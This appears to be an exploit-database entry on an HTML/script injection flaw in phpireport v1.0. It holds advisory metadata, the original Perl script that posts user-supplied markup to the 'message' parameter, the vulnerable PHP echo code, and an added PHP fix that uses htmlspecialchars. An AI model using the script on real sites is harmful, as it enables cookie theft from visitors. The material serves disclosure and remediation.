vendor: phpireport
by: Or4nG.M4n
CVSS: 7,5 HIGH
Html injection
CWE: 79
Product Name: phpireport
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: YES
Related CWE: N/A
CPE: //a:phpireport
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Remote Html Code injection

The vulnerability exists in the phpireport v1.0 application due to improper sanitization of user-supplied input in the 'message' parameter of the 'index.php' script. An attacker can inject malicious HTML and script code into the application, which will be executed in the browser of the victim in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

The application should properly sanitize user-supplied input before using it in the HTML page.
Source

Exploit-DB raw data:

#!/usr/bin/perl
########################################################################
# Title    = phpireport v1.0 => Remote Html Code injection
# Author   = Or4nG.M4n
# Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar
# Thnks :
# +----------------------------------+
# |   xSs m4n   i-Hmx   h311 c0d3    |
# |   Dr.Bnned ahwak2000 sa^Dev!L    |
# +----------------------------------+
#
#	                                 Html injection 
# vuln : messages_viewer.php
# vuln : home.php
# vuln : history.php
# code :
#	
#	echo "
#		<li>
#			<div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div>
#			<br>
#			<div class='post-details'>".stripslashes($message)."</div>
#		</li>
#	";
# How i can Fixed ..
# in all vuln file 
# Replace : stripslashes => Replace with => htmlspecialchars
# Thnks to All Stupid Coders 
#
use LWP::UserAgent;

print "Code to inject #";
my $inj = <STDIN>;
chomp $inj;
my $url = 'http://localhost/phpireport/index.php';

my $ua       = LWP::UserAgent->new();
my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'></textarea>
my $content  = $response->decoded_content();
print "\n done \n";

# The End
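
The fix named in the script header (replace stripslashes with htmlspecialchars), written out for the quoted echo block as an added example; it is not phpireport's code or the exploit author's. h() and render_post() are hypothetical helpers, the sample values are constructed, and the flags are set explicitly because htmlspecialchars() did not encode single quotes by default before PHP 8.1.

```php
<?php
declare(strict_types=1);

// Added example. Assumption: $name, $message and $time arrive as plain
// strings without added backslashes (if they are stored slash-escaped,
// unslash first and then encode: h(stripslashes($value))).

/** Encode a value for HTML element content or a quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ' (the markup uses single-quoted attributes).
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened form of the list item echoed by the files named in the header. */
function render_post(string $name, string $message, string $time): string
{
    // Every dynamic value is encoded at output time, $time included.
    return "<li>\n"
        . "\t<div class='post-details'>"
        . "<div style='float:left'>user: " . h($name) . "</div> "
        . "<div style='float:right'>" . h($time) . "</div></div>\n"
        . "\t<br>\n"
        . "\t<div class='post-details'>" . h($message) . "</div>\n"
        . "</li>\n";
}

// Constructed sample input: markup in the message, a quote in the name.
$name    = "guest' title='x";
$message = "<script>alert(1)</script>";
$time    = "2009-01-01 12:00";

$html = render_post($name, $message, $time);

// Self-check: the raw values must not survive, the encoded forms must be present.
$ok = strpos($html, $message) === false
    && strpos($html, $name) === false
    && strpos($html, '&lt;script&gt;alert(1)&lt;/script&gt;') !== false
    && strpos($html, 'guest&#039; title=&#039;x') !== false;

if (!$ok) {
    fwrite(STDERR, "encoding check failed\n");
    exit(1);
}
echo $html;
```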